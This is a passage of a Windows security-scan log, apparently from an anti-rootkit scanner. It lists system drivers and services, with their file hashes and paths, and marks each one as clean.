20:47:13.0214 0x1e50  [ 8FBD94B69D6423E20ABCD59D86368B21, 218EF992095E365EC917413749856A64D55D8129D77098E24D670843233377F4 ] kbdclass        C:\windows\System32\drivers\kbdclass.sys
20:47:13.0230 0x1e50  kbdclass - ok
20:47:13.0261 0x1e50  [ E88C932ABDF8185A62C8F2FC7B051FB6, 67F9AF58237A11F0BF3D15AA5B32E5CE66B7AA039B999D938F7F6E63DCEA7A6E ] kbdhid          C:\windows\System32\drivers\kbdhid.sys
20:47:13.0261 0x1e50  kbdhid - ok
20:47:13.0292 0x1e50  [ FB6C185092E18011EF49989425C2AA87, 043524409E0A764201DD221C48B7DEEA0D161945EB37D4B88313BAB2299949DF ] kdnic           C:\windows\system32\DRIVERS\kdnic.sys
20:47:13.0292 0x1e50  kdnic - ok
20:47:13.0308 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] KeyIso          C:\windows\system32\lsass.exe
20:47:13.0308 0x1e50  KeyIso - ok
20:47:13.0370 0x1e50  [ 8B3EB6372436195B8EA8AE09A184BCE2, 9AFB7A9D6AEEBF5994C85B355155024768116E2D537C9FA169BC3F4594ECD35C ] KSecDD          C:\windows\system32\Drivers\ksecdd.sys
20:47:13.0370 0x1e50  KSecDD - ok
20:47:13.0417 0x1e50  [ 3DD9C86EA88E8B5A51904AD87E1F2E78, F9EC9A571212117C01934CD29057EB1B3FA095F670294244AF7D9387D3F6E555 ] KSecPkg         C:\windows\system32\Drivers\ksecpkg.sys
20:47:13.0417 0x1e50  KSecPkg - ok
20:47:13.0464 0x1e50  [ 81492FEEBF2F26455B00EE8DBAE8A1B0, E33AA2DFB2D3BB30B02CDADA2EC290F86329DA3198327A653F39A843D86390B9 ] ksthunk         C:\windows\system32\drivers\ksthunk.sys
20:47:13.0464 0x1e50  ksthunk - ok
20:47:13.0542 0x1e50  [ 5825DBACEDC3812B5CF8D40B997BF210, 1C2997BCC707C1029B21876E093038CE3BBF6E6694B4CCF7EEDD47172ED9A541 ] KtmRm           C:\windows\system32\msdtckrm.dll
20:47:13.0542 0x1e50  KtmRm - ok
20:47:13.0589 0x1e50  [ 256EE31588257E8A555DBFAA13F1908E, B6817F632EDEA483E35BF26846DCDD4E95E860620959179B2A5D8AD7EEDDB126 ] LanmanServer    C:\windows\system32\srvsvc.dll
20:47:13.0612 0x1e50  LanmanServer - ok
20:47:13.0627 0x1e50  [ 16650912BE5A94B40E0B3B4C39652B56, 908C2C9367AE0AC9AECB5D91514BB33ACD746D99F19C1A8DD6A9550E9CAD9E00 ] LanmanWorkstation C:\windows\System32\wkssvc.dll
20:47:13.0643 0x1e50  LanmanWorkstation - ok
20:47:13.0690 0x1e50  [ CEEFD29FC551F289810B0B9381B321DC, 900F206B487B2190D9363F28AA4BA0CD7DCFE1D005BE05A48AF74B1B81194691 ] lltdio          C:\windows\system32\DRIVERS\lltdio.sys
20:47:13.0690 0x1e50  lltdio - ok
20:47:13.0736 0x1e50  [ BCF53485E0A94722CDE3C4A93CD8EB8C, D24E1066EB102245A89A5D17D608DB9DF6B71C99F1C77E070B95EFD17D268141 ] lltdsvc         C:\windows\System32\lltdsvc.dll
20:47:13.0736 0x1e50  lltdsvc - ok
20:47:13.0768 0x1e50  [ 5A2F7F1CBC2E631A497DAD16164E06D2, 35274FC6C386380B01B5E8F467E71A2C4E2FB2AD701554F9B1A9B036B0340142 ] lmhosts         C:\windows\System32\lmhsvc.dll
20:47:13.0768 0x1e50  lmhosts - ok
20:47:13.0814 0x1e50  [ 022CDD12161B063D7852B1075BF3FFF2, E21267243AF2FC208D27E67827B1264A762C99AECEDB7AD2C48A04F421A6B2F0 ] LSI_SAS         C:\windows\system32\drivers\lsi_sas.sys
20:47:13.0814 0x1e50  LSI_SAS - ok
20:47:13.0830 0x1e50  [ 07AD59D669B996F29F91817F0ECFA34F, 026F332F862D142BFFC9D169CCD17A35BFB6B301EEC72AA13E16369B3520919C ] LSI_SAS2        C:\windows\system32\drivers\lsi_sas2.sys
20:47:13.0846 0x1e50  LSI_SAS2 - ok
20:47:13.0877 0x1e50  [ 216FB796AA4E252ACCE93B1BCB80B5EC, 5B1E49B5F7B9C7A778198D27F8EE500FE35DC32D40B22A3D6ED67560BEB04212 ] LSI_SCSI        C:\windows\system32\drivers\lsi_scsi.sys
20:47:13.0877 0x1e50  LSI_SCSI - ok
20:47:13.0908 0x1e50  [ 5E80530AF37102488EE980B4A92AF99F, 364E18EAD9AC22F8A306B24C6C43E58224F6BE2744EFEAA2484696B8D9880851 ] LSI_SSS         C:\windows\system32\drivers\lsi_sss.sys
20:47:13.0908 0x1e50  LSI_SSS - ok
20:47:13.0970 0x1e50  [ 1DC9B701F8EB7D67774035AC9C3104F6, 77371267CDA605F78674BF8FA14B134B22299CD96EADA60A68762207595F0B46 ] LSM             C:\windows\System32\lsm.dll
20:47:13.0986 0x1e50  LSM - ok
20:47:14.0017 0x1e50  [ 2BDC5D711FA61307CE6190D47C956368, 6BCDC6CBB9783F1ABE8957BDA94AF977DFB2A310BB6D19085EFC8609C97FD180 ] luafv           C:\windows\system32\drivers\luafv.sys
20:47:14.0017 0x1e50  luafv - ok
20:47:14.0080 0x1e50  [ 7991C0E7A33CF921FDE54D7D2807E41B, A68B652429A08564710FF09B3DDF81211C1802DFF9B522128763AAB29A43E574 ] MBAMProtector   C:\windows\system32\drivers\mbam.sys
20:47:14.0080 0x1e50  MBAMProtector - ok
20:47:14.0189 0x1e50  [ 6EE5EA44AC06A52CE03ACD37281E078D, A65CF98E0C2EEED10FD9A3CBFB8D5E8317A16EC522F798338FBFB971651233C0 ] MBAMScheduler   C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
20:47:14.0236 0x1e50  MBAMScheduler - ok
20:47:14.0298 0x1e50  [ 5E30FA7FFB73198C1AEEE8A1B97ED9BF, 62F5A61E33DA7ADEA9EBB32C1FEBFE58F6A267B01C4D6BE646ED7C154DEA662F ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
20:47:14.0314 0x1e50  MBAMService - ok
20:47:14.0392 0x1e50  [ 8A50D5304E6AE48664CF5838EC32F647, C76943FABEE1B5E1B641AA610668CCD4227E2C4B191DD30B79D3AB31A9E8B5BE ] MBAMSwissArmy   C:\windows\system32\drivers\MBAMSwissArmy.sys
20:47:14.0392 0x1e50  MBAMSwissArmy - ok
20:47:14.0438 0x1e50  [ 9073CAC1BF4CE98EC89A805261FDF296, 6290D2512872E7B797A8D0F9246404CB86655F0F38412DCF4E3F63CB94AC2F9B ] MBAMWebAccessControl C:\windows\system32\drivers\mwac.sys
20:47:14.0438 0x1e50  MBAMWebAccessControl - ok
20:47:14.0470 0x1e50  [ 9B0D829C3BE4E7472DB9DD2B79908E3C, ACED5806FFF39E84007B5A3DCB16315329DC53007F46B1BEEDC391CC659F7DD3 ] megasas         C:\windows\system32\drivers\megasas.sys
20:47:14.0470 0x1e50  megasas - ok
20:47:14.0516 0x1e50  [ ECC3F54C7AFC318271C4F0B4606D8DB0, FD1ACB18B8C912C7A57DABCD5460800DD0721A82E09C8D79C47B3392D61CBEA6 ] MegaSR          C:\windows\system32\drivers\MegaSR.sys
20:47:14.0532 0x1e50  MegaSR - ok
20:47:14.0563 0x1e50  [ EEE908BE7143FCA48CF0CB87214E2AB8, 4F9BD299F559DD36DBD93489CFAA753F236FBB70946E034D2E2260059AE20962 ] MMCSS           C:\windows\system32\mmcss.dll
20:47:14.0579 0x1e50  MMCSS - ok
20:47:14.0594 0x1e50  [ 780098AD5DA8A4822E2563984C85EF7B, 29312970774E944B5ED388316CF3D350DCABF721F9695737B0AC56BE878B0446 ] Modem           C:\windows\system32\drivers\modem.sys
20:47:14.0594 0x1e50  Modem - ok
20:47:14.0641 0x1e50  [ EA8EAD3F5B762F889CC7F3966625B48B, B701A42E5E08B7BC6601560446146803182E5DC631AB73E9408F19CB6432F121 ] monitor         C:\windows\System32\drivers\monitor.sys
20:47:14.0641 0x1e50  monitor - ok
20:47:14.0672 0x1e50  [ 618446B98C79776654340CE27C73485E, EFE7169FDD545933B5949DA2D09266971C0C3E6894E7BD8AFE29E41567C72B16 ] mouclass        C:\windows\System32\drivers\mouclass.sys
20:47:14.0672 0x1e50  mouclass - ok
20:47:14.0704 0x1e50  [ C0ADEBED913295803B579ED288936CBB, 58F71541166D1DA07C18FBD27458D55E3F8AD7291CB7496B3A2F01372A5B0CAE ] mouhid          C:\windows\System32\drivers\mouhid.sys
20:47:14.0704 0x1e50  mouhid - ok
20:47:14.0750 0x1e50  [ E7E9DBFDD3F25ED0C05B99AE9FA18BDE, 6D0204BA271FD3262DAE6E6BF9C12C0D49E3C9AF40EB1E072BD5CA5E2B8598D5 ] mountmgr        C:\windows\system32\drivers\mountmgr.sys
20:47:14.0766 0x1e50  mountmgr - ok
20:47:14.0797 0x1e50  [ 4CCBBD4944777CA100B9A6C2F149A46F, 7FC172FAF8266BFBBBBAD94FD67EA3C1872F5927DC3900A9A54DB2DFE34E7415 ] mpsdrv          C:\windows\system32\drivers\mpsdrv.sys
20:47:14.0797 0x1e50  mpsdrv - ok
20:47:14.0875 0x1e50  [ 9DE3341BD4E14BC5FADFCAD3019F2D0D, 37E0531EADABC6D4BCC496826651D4D14CF0D10156FF13C11BDE466084B44FF4 ] MpsSvc          C:\windows\system32\mpssvc.dll
20:47:14.0906 0x1e50  MpsSvc - ok
20:47:14.0953 0x1e50  [ 3D70147F55F1EC84EB9139ED7FFE48BC, 12429C2FDDDA13815F0E18F9009011AA5360955759A23A38175543F480CB92EF ] MRxDAV          C:\windows\system32\drivers\mrxdav.sys
20:47:14.0953 0x1e50  MRxDAV - ok
20:47:15.0016 0x1e50  [ 7A761AEE58658378BBA45D360F874CB0, 31972E63D93E07D92EF69571B7ED1E69B1358DCA5BEED62A9372F6411B4DFDB3 ] mrxsmb          C:\windows\system32\DRIVERS\mrxsmb.sys
20:47:15.0016 0x1e50  mrxsmb - ok
20:47:15.0062 0x1e50  [ 06D5F2FA3C61E8EA91648EA8E9F99FD3, C665B7896501D42C73955F4EAF4FA3C6B2C9286957D6023C235AFBF9BFB761C6 ] mrxsmb10        C:\windows\system32\DRIVERS\mrxsmb10.sys
20:47:15.0078 0x1e50  mrxsmb10 - ok
20:47:15.0125 0x1e50  [ 697B78CE3925E4FBFC544232A5E9E2EB, 2D03425513572F6098BAAF82C0EDB49EBAB88438971D349CA1917DA0BDB76334 ] mrxsmb20        C:\windows\system32\DRIVERS\mrxsmb20.sys
20:47:15.0140 0x1e50  mrxsmb20 - ok
20:47:15.0172 0x1e50  [ 98487487D6B3797CA927E9D7B030AE13, 05840AF0DD2E3CB596DA768DBD0728B52210EC05B55AB5921E697AD8956938DD ] MsBridge        C:\windows\system32\DRIVERS\bridge.sys
20:47:15.0187 0x1e50  MsBridge - ok
20:47:15.0218 0x1e50  [ 4A07458EB4F17573BD39F22029A991C1, 74D7A1882EA4D19B8F090C2813489E5D3F759BF4AF2D88AE852EC6510C405B5E ] MSDTC           C:\windows\System32\msdtc.exe
20:47:15.0218 0x1e50  MSDTC - ok
20:47:15.0296 0x1e50  [ 3886F1F2A4D2900ABAA7E4486BEEE6A2, ECCA22985838A914EDC866C491DEB64B9FF5110EFA9BEE541F634AC5EC3081F9 ] Msfs            C:\windows\system32\drivers\Msfs.sys
20:47:15.0296 0x1e50  Msfs - ok
20:47:15.0328 0x1e50  [ C32A7A39B960A42BA9D4FBE47213CA03, 4DA48587138972DA5E95AEDBBBE73BA8CCADC8172C6654427ABEAC8047B27E95 ] msgpiowin32     C:\windows\System32\drivers\msgpiowin32.sys
20:47:15.0328 0x1e50  msgpiowin32 - ok
20:47:15.0359 0x1e50  [ D3857A767B91A061B408CCAB02DA4F40, A4D780772086AD8717EE6DC2B6189F796939FB5E5AA08FD9D1984101998FBECF ] mshidkmdf       C:\windows\System32\drivers\mshidkmdf.sys
20:47:15.0359 0x1e50  mshidkmdf - ok
20:47:15.0390 0x1e50  [ 839B48910FB1E887635C48F3EC11A05E, F8CFD99911500CC1B6A90C8E2A1697BD5A6E5776A62A62FE5B342FE204C936B1 ] mshidumdf       C:\windows\System32\drivers\mshidumdf.sys
20:47:15.0390 0x1e50  mshidumdf - ok
20:47:15.0406 0x1e50  [ 55C0DB741E3AB7463242B185B1C2997C, D2E2A5B48A64EA0EC2A6566C08E65A38D11CEA64BCA7B57793BA0D009E4D974A ] msisadrv        C:\windows\system32\drivers\msisadrv.sys
20:47:15.0406 0x1e50  msisadrv - ok
20:47:15.0437 0x1e50  [ 216C6B035A4BA5560E1255BD8E5BB89F, A14E038604B9A5506DB145A4D9F51E2751AC825240D2744924F39C332B5DE00B ] MSiSCSI         C:\windows\system32\iscsiexe.dll
20:47:15.0452 0x1e50  MSiSCSI - ok
20:47:15.0468 0x1e50  msiserver - ok
20:47:15.0484 0x1e50  [ 509809566E49F4411055864EA8D437CD, 70F37BF9C759E8BCA1C6AC8FB9805950925E1C648ED37E8561A0F7A407DFDC28 ] MSKSSRV         C:\windows\system32\drivers\MSKSSRV.sys
20:47:15.0484 0x1e50  MSKSSRV - ok
20:47:15.0515 0x1e50  [ 63145201D6458E4958E572E7D6FC2604, EDD4A8A3BBE94B983554B1117734E66A2647B867269C5F0567C47EDE6F3FACCB ] MsLldp          C:\windows\system32\DRIVERS\mslldp.sys
20:47:15.0515 0x1e50  MsLldp - ok
20:47:15.0546 0x1e50  [ 99D526E803DB6D7FF290FD98B6204641, 4AFAA3B1186621AEAD19E12D3DBE104DD8FCD5C106F9EC3ADA4AD1BC7093E61F ] MSPCLOCK        C:\windows\system32\drivers\MSPCLOCK.sys
20:47:15.0546 0x1e50  MSPCLOCK - ok
20:47:15.0562 0x1e50  [ 06FA77C3E2A491ADCD704C5E73006269, 465A7EE5387E6C11398A554F73437278F5BF110356E7F49F315905C1F2459278 ] MSPQM           C:\windows\system32\drivers\MSPQM.sys
20:47:15.0562 0x1e50  MSPQM - ok
20:47:15.0600 0x1e50  [ E134EC4DE11CF78CB01432D180710D84, BB111F97AEEFDCA5866B157E9957599CD7A4952B5BCCA0B0BCA9EDFCD17E61FE ] MsRPC           C:\windows\system32\drivers\MsRPC.sys
20:47:15.0616 0x1e50  MsRPC - ok
20:47:15.0647 0x1e50  [ B5AECF12F09DEE97C9FCAA5BA016CE1E, F5305C4CE6C93A3A3481BD13BE0C23FE26571E11029ACFFE75FB78913681FCFC ] mssmbios        C:\windows\System32\drivers\mssmbios.sys
20:47:15.0647 0x1e50  mssmbios - ok
20:47:15.0678 0x1e50  [ 72D66A05E0F99F2528F6C6204FD22AA1, B14D433BC5795F1DC4C672302285E665DC012693E75574F60664AAD8874DE562 ] MSTEE           C:\windows\system32\drivers\MSTEE.sys
20:47:15.0678 0x1e50  MSTEE - ok
20:47:15.0710 0x1e50  [ 8AAAE399FC255FA105D4158CBA289001, 2F55C02605B4A3406B289FF9D46C76260B9138E3DE96AFAEA0E0522E5A2A746C ] MTConfig        C:\windows\System32\drivers\MTConfig.sys
20:47:15.0710 0x1e50  MTConfig - ok
20:47:15.0741 0x1e50  [ 3BCB702F3E6CC622DCAFCAA45D7CDE0A, 00D33A4AB3E7C5F65F59C63F8E2FD27EF38D5484595F785D5632E9414E29352C ] Mup             C:\windows\system32\Drivers\mup.sys
20:47:15.0756 0x1e50  Mup - ok
20:47:15.0772 0x1e50  [ 3A1E095277BBD406CEA8EA6B76950664, 47838F307A6354E77C19A7B1F3F3E22726EF60403B611F358AD6FFE81D7214E7 ] mvumis          C:\windows\system32\drivers\mvumis.sys
20:47:15.0788 0x1e50  mvumis - ok
20:47:15.0834 0x1e50  [ 4B18840511D720BA118D3017E8165875, 724458A69269A5AE57E8DAB74FF3C198A79B6F7A9602BF38A70B4A40543ED167 ] napagent        C:\windows\system32\qagentRT.dll
20:47:15.0850 0x1e50  napagent - ok
20:47:15.0897 0x1e50  [ 43D7388A90A4C6EA346A4D6FF0377479, DFDCFA448B49C8A577056070AF516F08CD2E452706A3CF9173195ABA4256F35D ] NativeWifiP     C:\windows\system32\DRIVERS\nwifi.sys
20:47:15.0912 0x1e50  NativeWifiP - ok
20:47:15.0959 0x1e50  [ 6A0C3996DA7DAE6D6939676D786EEEC4, 6E8A4C6234FD3040BC889E92016A4D5AC7BCAF5059521E50C733966163A546A0 ] NcaSvc          C:\windows\System32\ncasvc.dll
20:47:15.0959 0x1e50  NcaSvc - ok
20:47:15.0990 0x1e50  [ C982FE4CC91DECE2259F494FCEB4030F, 4C285407E6F9FBBA92180F4063AEFB736ED142D802F0151002F0CC20AB7BB4E5 ] NcdAutoSetup    C:\windows\System32\NcdAutoSetup.dll
20:47:15.0990 0x1e50  NcdAutoSetup - ok
20:47:16.0068 0x1e50  [ A10E176F3B2BF83EDE7B5C4658C93B66, 42F2FAEB4A29BBC6727D7E159D3E7E2E66D33785E5C98496EEB44D281601A23E ] NDIS            C:\windows\system32\drivers\ndis.sys
20:47:16.0100 0x1e50  NDIS - ok
20:47:16.0131 0x1e50  [ 39C8A1D9D46F5E83A016BCAB72455284, 80DBED610E0818C2C7122FBC5BC8C15BCE981538AE48DC48F464A86389AF3F68 ] NdisCap         C:\windows\system32\DRIVERS\ndiscap.sys
20:47:16.0131 0x1e50  NdisCap - ok
20:47:16.0162 0x1e50  [ 762941932B7E4C588E48A577BA9D6440, 71FA1870E398CB848D8294FEF6C60E0499CAB9A16EC3F487564C41072590E4F3 ] NdisImPlatform  C:\windows\system32\DRIVERS\NdisImPlatform.sys
20:47:16.0162 0x1e50  NdisImPlatform - ok
20:47:16.0209 0x1e50  [ 7A6F8A6D0E01432EBA294EF29CDD0FA7, D902AE15194A9F8A2198914FC76184FE7E2B589747275952A04A52853128FDB8 ] NdisTapi        C:\windows\system32\DRIVERS\ndistapi.sys
20:47:16.0209 0x1e50  NdisTapi - ok
20:47:16.0240 0x1e50  [ 79AB68BB3FFF974AD4F41FA559F4EC67, 1745EC6520B48E325C56D98A1F4DB9CE135FE3E097B3D66E6598791132CAD7BD ] Ndisuio         C:\windows\system32\DRIVERS\ndisuio.sys
20:47:16.0256 0x1e50  Ndisuio - ok
20:47:16.0271 0x1e50  [ 62C7DBF4F9301F76CF87D4B9D8F57BF8, D51FEF198F74FDF583826E259E4736F51CD49908194104677889FD135EEC2EBC ] NdisWan         C:\windows\system32\DRIVERS\ndiswan.sys
20:47:16.0287 0x1e50  NdisWan - ok
20:47:16.0302 0x1e50  [ 62C7DBF4F9301F76CF87D4B9D8F57BF8, D51FEF198F74FDF583826E259E4736F51CD49908194104677889FD135EEC2EBC ] NDISWANLEGACY   C:\windows\system32\DRIVERS\ndiswan.sys
20:47:16.0302 0x1e50  NDISWANLEGACY - ok
20:47:16.0349 0x1e50  [ 3730942D7DB2F8BB5F84542B7FF6F650, 89C9D7D7305205BDB304CE6DA7D1A57EDE86A9D77429698802A39D75EB78CAAB ] NDProxy         C:\windows\system32\drivers\NDProxy.sys
20:47:16.0349 0x1e50  NDProxy - ok
20:47:16.0396 0x1e50  [ D3F60A4345FCA9C1BE68AD7D0D6DE770, 214AF09F4B021C2F8655FBC8AC8C801E89CD9115CDE690FAEBDA69D63D660EDD ] Ndu             C:\windows\system32\drivers\Ndu.sys
20:47:16.0396 0x1e50  Ndu - ok
20:47:16.0427 0x1e50  [ 7C203A76394F9AE68F69EEE5F9612C4A, 2222654915913BDC9367A2075714906A10CF22C047A7494CD59CB71834ED1B62 ] NetBIOS         C:\windows\system32\DRIVERS\netbios.sys
20:47:16.0427 0x1e50  NetBIOS - ok
20:47:16.0458 0x1e50  [ 7CEC25C682D319D484630B3952C31A11, 025C46B367E0570E9E3F9DF1564C3E47B1524E9E9A180BBDF0E9C684838F5E42 ] NetBT           C:\windows\system32\DRIVERS\netbt.sys
20:47:16.0474 0x1e50  NetBT - ok
20:47:16.0490 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] Netlogon        C:\windows\system32\lsass.exe
20:47:16.0505 0x1e50  Netlogon - ok
20:47:16.0552 0x1e50  [ 89519D29CBEC2121CA65CC29C4D345E0, F3BA7BCAFEC8DD8B29837458D1B2B1DEE748AEAAAE0575FD3AAE65CFC72A04CD ] Netman          C:\windows\System32\netman.dll
20:47:16.0568 0x1e50  Netman - ok
20:47:16.0630 0x1e50  [ 79FA9393C67EBBF92A56923592CF7A7C, A8AB8A6346B97B68810CC632F425085BE9E63ACAED0F119A7BFD03F2DA4AA5F6 ] netprofm        C:\windows\System32\netprofmsvc.dll
20:47:16.0646 0x1e50  netprofm - ok
20:47:16.0692 0x1e50  [ 5243CFC2E7161C91C2B355240035B9E4, CFD77485A9D7BC47F3A9C53D73B2AE2D5D04B90ED38628F3124EA569F4DE969E ] NetTcpPortSharing C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
20:47:16.0708 0x1e50  NetTcpPortSharing - ok
20:47:16.0739 0x1e50  [ 12DD2800E4EEA37DC9AE256AD62423B4, 34740469EEA8740CBACD881CB232C9ABB9AB180DE5F45336BC6DBE154259F29B ] nfrd960         C:\windows\system32\drivers\nfrd960.sys
20:47:16.0739 0x1e50  nfrd960 - ok
20:47:16.0802 0x1e50  [ 80ABCD4C2DE9FD832477303AE0CA3BE5, 98F3958E650CEB1006D92980503E1B176D2CA55D2A6742C1C27CDE829D137DA9 ] NlaSvc          C:\windows\System32\nlasvc.dll
20:47:16.0802 0x1e50  NlaSvc - ok
20:47:16.0817 0x1e50  [ 17E19A742FB30C002F8B43575451DBE1, 59D226A4A5B5281C399BE96C694915E38EEAF335D31F346B0C65D8F469D7C9C3 ] Npfs            C:\windows\system32\drivers\Npfs.sys
20:47:16.0833 0x1e50  Npfs - ok
20:47:16.0864 0x1e50  [ 8ED299C30792544264E558BEA79F0947, 8A03FDA9AADB79ECBCBCDC988B7D8CF0672689C9DF673A2ECFE0D2D88A9C6A6B ] npsvctrig       C:\windows\System32\drivers\npsvctrig.sys
20:47:16.0864 0x1e50  npsvctrig - ok
20:47:16.0895 0x1e50  [ 832B5FDF0B5577713FD7F2465FCD0ACE, 4A551CDBACED47DD781EC59F8B59A13D66EFD85DCF636BCFCBACFE5972A78E93 ] nsi             C:\windows\system32\nsisvc.dll
20:47:16.0895 0x1e50  nsi - ok
20:47:16.0926 0x1e50  [ 689B3B1E95C70ABF7AFF29F9406EF1E0, 8B62D8AE53E1B3218158FADC0075682AB06D18998CF5DE82C920A9CD91C0652F ] nsiproxy        C:\windows\system32\drivers\nsiproxy.sys
20:47:16.0926 0x1e50  nsiproxy - ok
20:47:17.0051 0x1e50  [ 7BE3EDFFA3216F989A6BDCB14795DD08, 19A2D0120C46CA9BCFBC16DC3E65687ACDDCBA33B79128188652BA2AFAA2EE2F ] Ntfs            C:\windows\system32\drivers\Ntfs.sys
20:47:17.0098 0x1e50  Ntfs - ok
20:47:17.0129 0x1e50  [ 4163ADE07DB51843AE31F65B94F5398D, 4349E7EF1EE1E71E1F436BA42F5B58871D82B987D513BA2D6E1CEB8A21BD1B20 ] Null            C:\windows\system32\drivers\Null.sys
20:47:17.0145 0x1e50  Null - ok
20:47:17.0176 0x1e50  [ D6D34118263412D3AAA8348A9572B7F2, 66106A25BC5A4CA7697A23ED67CEDB5C0BF678EA70FD967A405D2DF76F4CA3A4 ] nvraid          C:\windows\system32\drivers\nvraid.sys
20:47:17.0176 0x1e50  nvraid - ok
20:47:17.0207 0x1e50  [ 27AFC428D1D32ABD04A86763A4EDDEA9, 0920866013A8C8CFEE00E6AECDD41736F5501C49837E2D785998734F087F6B98 ] nvstor          C:\windows\system32\drivers\nvstor.sys
20:47:17.0223 0x1e50  nvstor - ok
20:47:17.0238 0x1e50  [ 051CFB5107BAAE510419BDC41F8C4036, 9990906F17A3886EF301D2AA6556263B52A1C0554C6BD18331AF44ECECAEE4B5 ] nv_agp          C:\windows\system32\drivers\nv_agp.sys
20:47:17.0254 0x1e50  nv_agp - ok
20:47:17.0348 0x1e50  [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:47:17.0348 0x1e50  ose - ok
20:47:17.0582 0x1e50  [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
20:47:17.0696 0x1e50  osppsvc - ok
20:47:17.0758 0x1e50  [ AB76700D764A342D7475FB8F47CAB18C, ECDF705D3E69EF6E7044C98A462A7281D0E7D0D85769C0815555D934B0B69C8D ] p2pimsvc        C:\windows\system32\pnrpsvc.dll
20:47:17.0758 0x1e50  p2pimsvc - ok
20:47:17.0805 0x1e50  [ 4319FD931DCD796435ECB5DB4A04FBA5, 20185B2F359EEC202B37019A4E4F5B914ADCF78B97AF0CBD91EECED2259FC6DE ] p2psvc          C:\windows\system32\p2psvc.dll
20:47:17.0821 0x1e50  p2psvc - ok
20:47:17.0852 0x1e50  [ 4563DAF8C6A740AD7F501E219BD10766, 7A1212DDAE2D66A9C2041262796904E36036CDC4C5B75C2F66B8DF9D89F7C25D ] Parport         C:\windows\System32\drivers\parport.sys
20:47:17.0852 0x1e50  Parport - ok
20:47:17.0899 0x1e50  [ D6ACCF9F2EEEEA711C14EFD976E573F3, 60D2A81832A8D24F91C3EF134440D5026354917F59462BACBCE7A01D84767D91 ] partmgr         C:\windows\system32\drivers\partmgr.sys
20:47:17.0914 0x1e50  partmgr - ok
20:47:17.0977 0x1e50  [ 4811D9EC53649105A5A8BEA661B0F936, C77907E03D0561500FCFEAFAC323E9679E66297329901A0CA2BD7E919419A8E8 ] PcaSvc          C:\windows\System32\pcasvc.dll
20:47:17.0977 0x1e50  PcaSvc - ok
20:47:18.0008 0x1e50  [ 4A003E8F718C1E6A2050CA98CD53E3E2, BCC3BE1EC3FA4967353371D85094D096940A7B5944A6FFCA31E8FBE83D92CC6C ] pci             C:\windows\system32\drivers\pci.sys
20:47:18.0023 0x1e50  pci - ok
20:47:18.0039 0x1e50  [ F9908D274D458220F91E89B54D78D837, 1E89ABFA6B375383E0297CEE5AF66E37F90E16DD21ABA5C91777A86CDF013B4D ] pciide          C:\windows\system32\drivers\pciide.sys
20:47:18.0039 0x1e50  pciide - ok
20:47:18.0086 0x1e50  [ 84D19CB6102627932DCB5DFDF89FE269, 2F9C47E076645B35877D9ACA77968EFFCDA8794D76265CD9A4AAA239C4B33C5F ] pcmcia          C:\windows\system32\drivers\pcmcia.sys
20:47:18.0086 0x1e50  pcmcia - ok
20:47:18.0117 0x1e50  [ CEBBAD5391C2644560C55628A40BFD27, 8AAA6EBD8D89FC91AECCCF1452F53C5650A1A17027FF4E64D224371404CE4C8B ] pcw             C:\windows\system32\drivers\pcw.sys
20:47:18.0117 0x1e50  pcw - ok
20:47:18.0164 0x1e50  [ 0698DEDEAD6A00AD0D468C687D830FBF, B9DCA1A61F2EF80DB26380F390F2E9A17114D33129D61CF465B949B6A7916CAA ] pdc             C:\windows\system32\drivers\pdc.sys
20:47:18.0164 0x1e50  pdc - ok
20:47:18.0257 0x1e50  [ 61FE70659CD43E07F94DA4DC31DEC493, 3739B6670B440173FD81DE3D47B0B90FAF296802AD4F57C05BF5CF191BF16022 ] PEAUTH          C:\windows\system32\drivers\peauth.sys
20:47:18.0273 0x1e50  PEAUTH - ok
20:47:18.0289 0x1e50  [ EE926C59CBD4DC4DC9FBB85014A2F1A5, 777459BD30A480E03EA5D0BBA431C2CD573403687FAA0B29F172086A0304E230 ] PEGAGFN         C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys
20:47:18.0289 0x1e50  PEGAGFN - ok
20:47:18.0382 0x1e50  [ EB88FA19F0EA05DD04BE9C5FFEEFFE1A, 459CF99D5243C4ACAA38C7B426ADC52F1044C759D06A925D475DF6213AEB85CD ] PerfHost        C:\windows\SysWow64\perfhost.exe
20:47:18.0398 0x1e50  PerfHost - ok
20:47:18.0507 0x1e50  [ 6E84BFF58F7643499277F29DFA2F8C8D, 401CCF137F35D9690C7B56B2BFEDB2DB72709EBE38626D787904B67640EF6F14 ] pla             C:\windows\system32\pla.dll
20:47:18.0554 0x1e50  pla - ok
20:47:18.0601 0x1e50  [ 799BE46D45D486704CE0F37CA5385262, BB78DEE83B9DB613B1C083D55FAA458BE3E394AED80EB91B599185A7272F33B3 ] PlugPlay        C:\windows\system32\umpnpmgr.dll
20:47:18.0616 0x1e50  PlugPlay - ok
20:47:18.0647 0x1e50  [ 8E2414E818C26C4A9C70CB2B8567F04F, A16B22AE143BA070C562FBE5DEF32F7E228F50B302B66E46B46C44C0F50A4461 ] PNRPAutoReg     C:\windows\system32\pnrpauto.dll
20:47:18.0647 0x1e50  PNRPAutoReg - ok
20:47:18.0694 0x1e50  [ AB76700D764A342D7475FB8F47CAB18C, ECDF705D3E69EF6E7044C98A462A7281D0E7D0D85769C0815555D934B0B69C8D ] PNRPsvc         C:\windows\system32\pnrpsvc.dll
20:47:18.0694 0x1e50  PNRPsvc - ok
20:47:18.0772 0x1e50  [ 0108C8E5176D590F242701EF5A62CC26, 3A72F5D4402663B7445F6B3C55F01E83A619B6192F7D3CC2DE3C57F9F50D5A2D ] PolicyAgent     C:\windows\System32\ipsecsvc.dll
20:47:18.0772 0x1e50  PolicyAgent - ok
